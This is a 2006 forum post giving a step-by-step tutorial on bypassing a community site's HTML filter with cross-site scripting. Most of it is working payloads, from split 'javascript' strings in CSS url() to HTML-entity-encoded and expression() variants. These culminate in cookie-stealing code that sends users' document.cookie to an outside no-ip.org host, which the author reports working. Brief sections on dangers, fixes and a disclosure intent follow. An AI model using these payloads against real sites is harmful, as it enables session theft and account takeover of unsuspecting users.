Jump to content


Photo

Xss


  • Please log in to reply
No replies to this topic

#1 nepali_dude

nepali_dude

    Newbie

  • Members
  • Pip
  • 9 posts

Posted 04 March 2006 - 11:15 AM

Cross Site Scripting('XSS') By Example

Table of Contents
1.Why this was written.
2.The objective.
3.The hack.
4.The dangers of the results.
5.The solution.
6.Resources

1. Why this was written
To me cross site scripting is, apart from perhaps social engineering, the biggest threat to online communities these days. Many sites, including the undisclosed site that is used here, are vulnerable to cross site scripting. The undisclosed site shall hereby be known as victim.com. I have also, as a second goal, written this paper to alert victim.com about their security holes and how they can fix them. As I look now, the site has 109,000,000+ users and it amazes me that this flaw has not been found before. I will also be looking to create a mock up, with no resemblance to the original site, of course, that I will be releasing to the security community hackthissite.org if they want it or on my own site if they do not. By the time you are reading this, victim.com will probably have already fixed the security holes I highlight in this paper. I will be submitting this to victim.com with a week to go before I release this paper to the Internet and all of its occupants. I will only release the name of victim.com with their permission and it would be nice to have a small section, or even just a comment in the source code, stating that the site has benefited from my help

2. The objective
In this example, our victim site allows you to create 'mini' communities that have their own rules, ranks, chat boards, and can have competitions and such. These communities get a small place that they can place HTML to make their community look better, and more fit the theme. For example, a community that loves dogs might use HTML to put pictures of dogs everywhere. I would also like to note at this time that this is most likely a multibug, as there are other places that you can put HTML for others to view and I suspect the site has a single security function or class.
We will attempt to exploit their letting you use HTML so that we can inject javascript. If we can inject javascript, we can in fact take control of user accounts and either use javascript to automatically manipulate the user accounts, such as forcing the user to join the community whether they want to or not if they so much as look at the front page, or stealing the 'points' of the user by making them buy an expensive item from the user. This could also be used to redirect users to porn websites or websites that places virii, spyware, adware, or other malicious content on the user's computer.

3. The hack
Ok so we know we can use HTML, but they say that they don't allow javascript so let's see how true that is. We start with the simple stuff first, so that means we start with the script tag.

<script>alert('0wned')</script>

The resulting HTML

-blocked-alert('XSS')-blocked-

Hmm so they actually do block script tags! What a surprise! Ok so next what if we can put a link that will link to some javascript?

<a href=”javascript:alert('0wned')”>Click Here</a>

The resulting HTML

-blocked-Click Here</a>

Ahh k so they filter that too. I see that they erased the entire <a> tag though so what if we put the javascript in an image?

<img src=”javascript:alert('0wned')” />

But wait... An error message! src tags are limited to ending in certain values! (Note: this error message has been modified to protect the identity of the original site.

Sorry! src embedded files may only end in:

.mp3
.jpeg
.gif
.bmp
.midi
.wav
.jpg
.mid
.png

You may not use any form of the <src=alink> tag to embed files that end in

”javascript:alert(0wned from the url: ”javascript:alert(0wned

Even if you didn't use 'img src', this still applies to all tags that have 'src' in them. For example, 'background src'.

What about if we used a comment to bypass this filter?

<img src=”javascript:alert('0wned.gif')” />

The resulting HTML

-blocked-

Ok, so now is where we begin the REAL filter evasion. What if we use CaPs to try and bypass filters that look only for same case strings?

<img src=”jAvAsCrIpT:alert('0wned.gif')” />

The resulting HTML

-blocked-

Ok, what if we injected hex? You need a tool to do this. I recommend burp proxy, a proxy that runs on localhost:8080 that will let you view, block, and alter requests.

<img src=”%6a%41%76%41%73%43%72%49%70%54:alert('owned.gif')” />

The resulting HTML

-blocked-

Uh oh they still got us... Let's change tacks. Let's use a DIV

<DIV STYLE="background-image: url(javascript:alert('0wned'))">

The resulting HTML

-blocked-

Hmm so far it seems that it looks for any tag with 'javascript' in it. What if we break it up?

<DIV STYLE="background-image: url(j

ava scri
pt:alert('0wned'))">

Don't ask me why but this IS valid javascript/HTML in IE. I am using firefox so I have to switch to IE to test this. The resulting HTML

<DIV STYLE="background-image: url(j

ava scri
pt:alert('0wned'))">
immediately upon seeing this I switched to IE and guess what? A message box entitled '0wned' popped up! So next step: simple, obvious cookie grabber

<DIV STYLE="background-image: url(j

ava scri
pt:document.location='http://netelemental.no-ip.org/cookie.php?cookie='+document.cookie)">

The resulting HTML

<DIV STYLE="background-image: url(j

ava scri
pt:document. &nbsp; &nbsp; location='http://netelemental.no-ip.org/cookie.php?cookie='&dagger;document. &nbsp; &nbsp; cookie))">
Let's try using eval to get past this.

<DIV STYLE="background-image: url(j

ava scri
pt:eval(\"docu\"+\"ment.location='http://netelemental.no-ip.org/c.php?c='+doc\"+\"ument.cookie\”))">

The resulting HTML:

<DIV STYLE="background-image: url(j

ava scri
pt:-blocked-"docu"&dagger;"ment.location='http://netelemental.no-ip.org/c.php?c='&dagger;doc"&dagger;"ument.cookie”))">
Ok so they change document AND eval so that it renders javascript useless while at the same time not affecting the look of a valid document.. Ok, what if we converted this to HTML hex, since it is in a CSS statement?

<DIV STYLE="background-image: url(j

ava scri
pt:&#x64;&#x6F;&#x63;&#x75;&#x6D;&#x65;&#x6E;&#x74;&#x2E;&#x6C;&#x6F;&#x63;&#x61;&#x74;&#x69;&#x6F;&#x6E;&#x3D;&#x27;&#x68;&#x74;&#x74;&#x70;&#x3A;&#x2F;&#x2F;&#x6E;&#x65;&#x74;&#x65;&#x6C;&#x65;&#x6D;&#x65;&#x6E;&#x74;&#x61;&#x6C;&#x2E;&#x6E;&#x6F;&#x2D;&#x69;&#x70;&#x2E;&#x6F;&#x72;&#x67;&#x2F;&#x63;&#x6F;&#x6F;&#x6B;&#x69;&#x65;&#x2E;&#x70;&#x68;&#x70;&#x3F;&#x63;&#x6F;&#x6F;&#x6B;&#x69;&#x65;&#x3D;&#x27;&#x2B;&#x64;&#x6F;&#x63;&#x75;&#x6D;&#x65;&#x6E;&#x74;&#x2E;&#x63;&#x6F;&#x6F;&#x6B;&#x69;&#x65;)">

The resulting HTML

<DIV STYLE="background-image: url(j

ava scri
pt:&#x64;&#x6F;&#x63;&#x75;&#x6D;&#x65;&#x6E;&#x74;&#x2E;&#x6C;&#x6F;&#x63;&#x61;&#x74;&#x69;&#x6F;&#x6E;&#x3D;&#x27;&#x68;&#x74;&#x74;&#x70;&#x3A;&#x2F;&#x2F;&#x6E;&#x65;&#x74;&#x65;&#x6C;&#x65;&#x6D;&#x65;&#x6E;&#x74;&#x61;&#x6C;&#x2E;&#x6E;&#x6F;&#x2D;&#x69;&#x70;&#x2E;&#x6F;&#x72;&#x67;&#x2F;&#x63;&#x6F;&#x6F;&#x6B;&#x69;&#x65;&#x2E;&#x70;&#x68;&#x70;&#x3F;&#x63;&#x6F;&#x6F;&#x6B;&#x69;&#x65;&#x3D;&#x27;&#x2B;&#x64;&#x6F;&#x63;&#x75;&#x6D;&#x65;&#x6E;&#x74;&#x2E;&#x63;&#x6F;&#x6F;&#x6B;&#x69;&#x65;)">
Guess what? We have the cookie! I have tried and it works. Now you can simply use your knowledge of javascript to do anything you want. Since I have also found another way to do this, I will go ahead and disclose it.

<DIV STYLE="width: expression(&#x64;&#x6F;&#x63;&#x75;&#x6D;&#x65;&#x6E;&#x74;&#x2E;&#x6C;&#x6F;&#x63;&#x61;&#x74;&#x69;&#x6F;&#x6E;&#x3D;&#x27;&#x68;&#x74;&#x74;&#x70;&#x3A;&#x2F;&#x2F;&#x6E;&#x65;&#x74;&#x65;&#x6C;&#x65;&#x6D;&#x65;&#x6E;&#x74;&#x61;&#x6C;&#x2E;&#x6E;&#x6F;&#x2D;&#x69;&#x70;&#x2E;&#x6F;&#x72;&#x67;&#x2F;&#x63;&#x6F;&#x6F;&#x6B;&#x69;&#x65;&#x2E;&#x70;&#x68;&#x70;&#x3F;&#x63;&#x6F;&#x6F;&#x6B;&#x69;&#x65;&#x3D;&#x27;&#x2B;&#x64;&#x6F;&#x63;&#x75;&#x6D;&#x65;&#x6E;&#x74;&#x2E;&#x63;&#x6F;&#x6F;&#x6B;&#x69;&#x65;)">

The resulting HTML

<DIV STYLE="width: expression(&#x64;&#x6F;&#x63;&#x75;&#x6D;&#x65;&#x6E;&#x74;&#x2E;&#x6C;&#x6F;&#x63;&#x61;&#x74;&#x69;&#x6F;&#x6E;&#x3D;&#x27;&#x68;&#x74;&#x74;&#x70;&#x3A;&#x2F;&#x2F;&#x6E;&#x65;&#x74;&#x65;&#x6C;&#x65;&#x6D;&#x65;&#x6E;&#x74;&#x61;&#x6C;&#x2E;&#x6E;&#x6F;&#x2D;&#x69;&#x70;&#x2E;&#x6F;&#x72;&#x67;&#x2F;&#x63;&#x6F;&#x6F;&#x6B;&#x69;&#x65;&#x2E;&#x70;&#x68;&#x70;&#x3F;&#x63;&#x6F;&#x6F;&#x6B;&#x69;&#x65;&#x3D;&#x27;&#x2B;&#x64;&#x6F;&#x63;&#x75;&#x6D;&#x65;&#x6E;&#x74;&#x2E;&#x63;&#x6F;&#x6F;&#x6B;&#x69;&#x65;)">

4. The dangers of the results
Here you can see that once injected, javascript can steal a user's cookies which means that the attacker can 'log in' as the user by masquerading those cookies as the attacker's own. Especially if an admin got their cookies stolen, this is a huge danger to the site. It cannot compromise the server, but it can compromise any user account that can be lured into viewing that page. Also functions such as document.forms[x].submit() can force the user to change settings or perform actions they do not want to. An attacker that really wanted full control could even use AJAX to mimick ANY action that the user could perform.

5. The solution
Simple. Simply alter the filter to convert such HTML hex back into ascii, and continue applying normal filters. Also put extra filters on CSS so that CSS can't be a source of problems in the future, EX make sure only certain CSS tags are used. Better yet, create your own style markup language to disallow unwanted tags. Another, GREAT solution is to force you users to use a web browser other than Internet Explorer. Please notice that these XSS exploits work ONLY in IE.

6. Resources
http://centricle.com/tools/ascii-hex/
http://ha.ckers.org/xss.html




1 user(s) are reading this topic

0 members, 1 guests, 0 anonymous users